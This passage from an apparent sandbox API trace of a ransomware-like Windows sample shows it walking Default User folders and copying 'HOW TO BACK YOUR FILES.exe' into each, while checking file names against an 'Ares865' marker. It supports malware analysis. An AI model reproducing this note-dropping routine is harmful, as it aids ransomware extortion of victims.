lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0042.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3b0 | out: hHeap=0x2b0000) returned 1 [0042.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.414] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned 69 [0042.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0042.414] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.414] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.414] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.414] GetLastError () returned 0x0 [0042.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.415] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.415] CloseHandle (hObject=0x118) returned 1 [0042.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.415] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.415] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.415] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.415] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.415] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="FeedsStore.feedsdb-ms" | out: lpString1="FeedsStore.feedsdb-ms") returned="FeedsStore.feedsdb-ms" [0042.415] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0042.415] lstrlenW (lpString="Ares865") returned 7 [0042.415] lstrcmpiW (lpString1="dsdb-ms", lpString2="Ares865") returned 1 [0042.415] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="Microsoft Feeds~" | out: lpString1="Microsoft Feeds~") returned="Microsoft Feeds~" [0042.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xae) returned 0x2cb3b0 [0042.415] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.415] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0042.415] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.415] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="aoldtz.exe") returned -1 [0042.415] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xdc) returned 0x2cba28 [0042.416] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.416] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0042.416] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.416] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0042.416] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.416] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 109 [0042.416] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.416] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.416] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.416] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.416] GetLastError () returned 0x0 [0042.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.416] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.417] CloseHandle (hObject=0x118) returned 1 [0042.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.417] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.417] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.417] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.417] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.417] lstrcpyW (in: lpString1=0x2e2e93c, lpString2="WebSlices~" | out: lpString1="WebSlices~") returned="WebSlices~" [0042.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf2) returned 0x2cba28 [0042.417] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.417] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0042.417] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.417] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0042.417] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.417] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 120 [0042.417] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.417] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.418] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.418] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.418] GetLastError () returned 0x0 [0042.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.418] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.418] CloseHandle (hObject=0x118) returned 1 [0042.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.418] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.419] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.419] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.419] lstrcpyW (in: lpString1=0x2e2e952, lpString2="Web Slice Gallery~.feed-ms" | out: lpString1="Web Slice Gallery~.feed-ms") returned="Web Slice Gallery~.feed-ms" [0042.419] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0042.419] lstrlenW (lpString="Ares865") returned 7 [0042.419] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.419] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3b0 | out: hHeap=0x2b0000) returned 1 [0042.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.419] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned 86 [0042.419] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.419] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.419] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.419] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.420] GetLastError () returned 0x0 [0042.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.420] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.420] CloseHandle (hObject=0x118) returned 1 [0042.420] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.420] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.420] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.420] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.420] lstrcpyW (in: lpString1=0x2e2e90e, lpString2="Microsoft at Home~.feed-ms" | out: lpString1="Microsoft at Home~.feed-ms") returned="Microsoft at Home~.feed-ms" [0042.420] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0042.420] lstrlenW (lpString="Ares865") returned 7 [0042.420] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.420] lstrcpyW (in: lpString1=0x2e2e90e, lpString2="Microsoft at Work~.feed-ms" | out: lpString1="Microsoft at Work~.feed-ms") returned="Microsoft at Work~.feed-ms" [0042.420] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0042.420] lstrlenW (lpString="Ares865") returned 7 [0042.420] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.420] lstrcpyW (in: lpString1=0x2e2e90e, lpString2="MSNBC News~.feed-ms" | out: lpString1="MSNBC News~.feed-ms") returned="MSNBC News~.feed-ms" [0042.420] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0042.421] lstrlenW (lpString="Ares865") returned 7 [0042.421] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.421] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0042.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.421] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned 75 [0042.421] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0042.421] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.421] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.421] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.421] GetLastError () returned 0x0 [0042.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.421] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.421] CloseHandle (hObject=0x118) returned 1 [0042.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.422] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.422] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.422] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.422] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History" [0042.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0042.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.422] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned 61 [0042.422] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History" [0042.422] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.422] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.423] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.423] GetLastError () returned 0x0 [0042.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.423] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.423] CloseHandle (hObject=0x118) returned 1 [0042.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.423] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.423] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.423] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" 